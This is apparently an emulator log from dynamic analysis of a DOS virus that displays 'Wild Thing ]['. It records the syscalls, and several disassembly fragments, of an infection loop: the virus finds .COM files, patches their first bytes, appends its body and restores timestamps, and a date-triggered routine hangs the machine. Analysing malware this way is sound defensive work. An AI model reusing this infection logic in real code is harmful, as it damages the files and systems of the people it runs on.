2018-12-25T11:45:47.898850943Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.908800669Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.911502611Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:47.916671664Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:47.918251414Z 26 PC: 12f84 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":2417,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:48.214749305Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:48.216476891Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32e], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x34a]
0x12e5b: int 0x21
0x12e5d: call 0x12f46
0x12e60: call 0x12f6a
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2cb]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a8]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2e1]
0x12e7f: mov ah, 0x3b
2018-12-25T11:45:48.218603668Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:48.221621197Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
0x12f4c: je 0x12f4f
0x12f4e: ret
0x12f4f: mov ah, 1
0x12f51: mov cx, 0x2020
0x12f54: int 0x10
0x12f56: mov ah, 2
0x12f58: xor dx, dx
0x12f5a: int 0x10
0x12f5c: xor ax, ax
0x12f5e: int 0x10
0x12f60: mov ah, 9
0x12f62: lea dx, word ptr [bp + 0x271]
0x12f66: int 0x21
0x12f68: jmp 0x12f68
0x12f6a: mov ah, 0x4e
0x12f6c: lea dx, word ptr [bp + 0x2d1]
0x12f70: mov cx, 7
0x12f73: int 0x21
0x12f75: jae 0x12f78
2018-12-25T11:45:48.224299955Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:48.230662301Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:48.236742975Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:48.243213481Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:48.262939998Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:48.275705847Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:48.277307317Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:48.284214877Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:48.2855347Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:48.288287136Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.29020352Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:48.299886116Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:48.301497611Z 62 PC: 12f30 | Close file
2018-12-25T11:45:48.309568554Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:48.315840379Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.317605516Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.321607944Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.327870662Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.335020502Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.33637377Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.343712795Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.345135094Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.34834379Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.350076523Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.35884275Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.360840503Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.369218648Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.379918941Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.38311031Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.389385381Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.399950635Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.408319889Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.409857551Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.416702863Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.418405917Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.421639132Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.423262865Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.431835594Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.434084362Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.442615866Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.453583971Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.456780249Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.462979846Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.473997797Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.481777113Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.483237092Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.490753643Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.492794613Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.495639659Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.497178213Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.630235357Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.63161306Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.814194281Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.829558561Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.833229807Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.839353304Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.87137974Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.878714826Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.880136664Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.887434959Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.888882928Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.891651671Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.893596118Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.910425532Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.911966626Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.931681591Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.9517598Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.954440588Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.960399488Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.983075477Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.990011996Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.991313664Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.998406107Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.999666546Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.002355912Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.004292882Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.034720005Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.037066151Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.065639417Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.102153153Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.105673866Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.11261279Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.138405581Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.145828707Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.148196555Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.155463568Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.156903237Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.160344736Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.162915052Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.18362293Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.185770596Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.221317207Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.267145761Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.270465613Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.274246268Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.307752136Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.315851706Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.317327213Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.324500892Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.326274278Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.359864652Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.410779099Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.413809932Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:49.418223045Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:49.420011389Z 26 PC: 12f84 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2417,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:48.418210533Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:48.419702937Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32e], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x34a]
0x12e5b: int 0x21
0x12e5d: call 0x12f46
0x12e60: call 0x12f6a
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2cb]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a8]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2e1]
0x12e7f: mov ah, 0x3b
2018-12-25T11:45:48.421965326Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:48.424901839Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
0x12f4c: je 0x12f4f
0x12f4e: ret
0x12f4f: mov ah, 1
0x12f51: mov cx, 0x2020
0x12f54: int 0x10
0x12f56: mov ah, 2
0x12f58: xor dx, dx
0x12f5a: int 0x10
0x12f5c: xor ax, ax
0x12f5e: int 0x10
0x12f60: mov ah, 9
0x12f62: lea dx, word ptr [bp + 0x271]
0x12f66: int 0x21
0x12f68: jmp 0x12f68
0x12f6a: mov ah, 0x4e
0x12f6c: lea dx, word ptr [bp + 0x2d1]
0x12f70: mov cx, 7
0x12f73: int 0x21
0x12f75: jae 0x12f78
2018-12-25T11:45:48.427109525Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:48.431173206Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:48.435025401Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:48.438677578Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:48.454646802Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:48.467964357Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:48.469270755Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:48.477179036Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:48.478897093Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:48.481592327Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.483917067Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:48.577657843Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:48.578876964Z 62 PC: 12f30 | Close file
2018-12-25T11:45:48.677268942Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:48.739415616Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.741296893Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.745474489Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.814130356Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.822325647Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.82395266Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.831245583Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.832680921Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.835489176Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.837734669Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.84945945Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.851163845Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.874788414Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.889739982Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:48.89167024Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:48.89831068Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:48.915337697Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:48.922668953Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:48.924733166Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:48.932197591Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.933622772Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:48.936882001Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:48.938522511Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:48.957198886Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:48.959086229Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:48.983049644Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:48.999292253Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.001617039Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.005420415Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.034692277Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.0395992Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.041759724Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.048475161Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.049816351Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.052716278Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.054404201Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.075685193Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.077132784Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.102528628Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.138467282Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.142169324Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.148315468Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.183777317Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.191819335Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.193279661Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.200264108Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.202102278Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.205018612Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.206715061Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.232078228Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.233763536Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.267186066Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.308339267Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.311135423Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.317287531Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.36025456Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.367353978Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.368770998Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.375975616Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.377467425Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.380309951Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.382459371Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.41078198Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.412313948Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.472174301Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.553608711Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.556486824Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.563280245Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:49.677704903Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:49.685436854Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:49.687618576Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:49.69482197Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.696288507Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:49.699788816Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:49.701491823Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:49.761983516Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:49.764511358Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:49.837455322Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:49.914630298Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:49.918547257Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:49.925593076Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.009921832Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.017804631Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.019391375Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.0264677Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.02821572Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.110587933Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.202980296Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.206115939Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:50.210872314Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:50.212731899Z 26 PC: 12f84 | Set disk transfer address (See above)
2018-12-25T11:45:50.214313182Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T11:45:52.396185696Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:45:52.398034275Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:45:52.401609942Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:45:52.404858621Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:45:52.416482953Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:45:52.418285225Z 62 PC: 91fc1 | Close file
2018-12-25T11:45:52.421408622Z 75 PC: 91fe0 | Execute program
2018-12-25T11:45:52.438148266Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:45:52.43940816Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:45:52.443996238Z 48 PC: c609 | Get DOS version
2018-12-25T11:45:52.447624931Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:45:52.450199891Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:45:52.453215883Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:45:52.457025903Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:52.46139596Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:52.466776469Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:45:52.478046528Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:45:52.479403402Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:45:52.481770735Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:45:52.505164964Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:45:52.509160212Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:45:52.511445148Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:45:52.513011695Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:45:52.514562551Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:52.516857171Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:45:52.518419873Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:45:52.527627691Z 62 PC: 8f8eb | Close file
2018-12-25T11:45:52.530933075Z 62 PC: 8f8f2 | Close file
2018-12-25T11:45:52.533204685Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.535068701Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.538366478Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.540315957Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.542287715Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.546543942Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.548147912Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.54966606Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.551640942Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.553332007Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.555018188Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.557002006Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.558800603Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.560388897Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.56248938Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.564075781Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.565625308Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.567893971Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.569516009Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.571056188Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.572813614Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.574772228Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.576308184Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.577939316Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.580335293Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.581876282Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.583556192Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.585422322Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.587301386Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.588863675Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:45:52.594272198Z 62 PC: 8f90e | Close file
2018-12-25T11:45:52.595926952Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:45:52.597728859Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:45:52.600103298Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:45:52.605629173Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:45:52.606838992Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:45:52.612452088Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:45:52.614216741Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:45:52.615699056Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:45:52.618244886Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:45:52.619924315Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:45:52.621424621Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:45:52.623469877Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:45:52.625043109Z 73 PC: 8fa11 | Release memory
2018-12-25T11:45:52.626611758Z 73 PC: 8efea | Release memory
2018-12-25T11:45:52.628052976Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:45:52.629691237Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:45:52.63155094Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:45:52.633158979Z 73 PC: 8f060 | Release memory
2018-12-25T11:45:52.634538955Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:45:52.644370798Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:52.65145784Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:45:52.653501054Z 62 PC: 8f0d1 | Close file
2018-12-25T11:45:52.656003647Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:45:52.682272164Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:45:52.683574063Z 48 PC: 12bee | Get DOS version
2018-12-25T11:45:52.685695592Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:45:52.688866017Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:45:52.690284672Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:45:52.691459111Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:45:52.694000028Z 72 PC: 1355d | Allocate memory
2018-12-25T11:45:52.696434161Z 25 PC: 13596 | Get default drive
2018-12-25T11:45:52.697987998Z 71 PC: 135ad | Get current directory
2018-12-25T11:45:52.701410204Z 59 PC: 135ba | Change current directory
2018-12-25T11:45:52.707742225Z 59 PC: 135c8 | Change current directory
2018-12-25T11:45:52.715814355Z 59 PC: 135d3 | Change current directory
2018-12-25T11:45:52.72233704Z 25 PC: 12d13 | Get default drive
2018-12-25T11:45:52.724104572Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:45:52.725695012Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:45:52.727811621Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:45:52.730325004Z 80 PC: 1301d | Set current PSP
2018-12-25T11:45:52.731185302Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
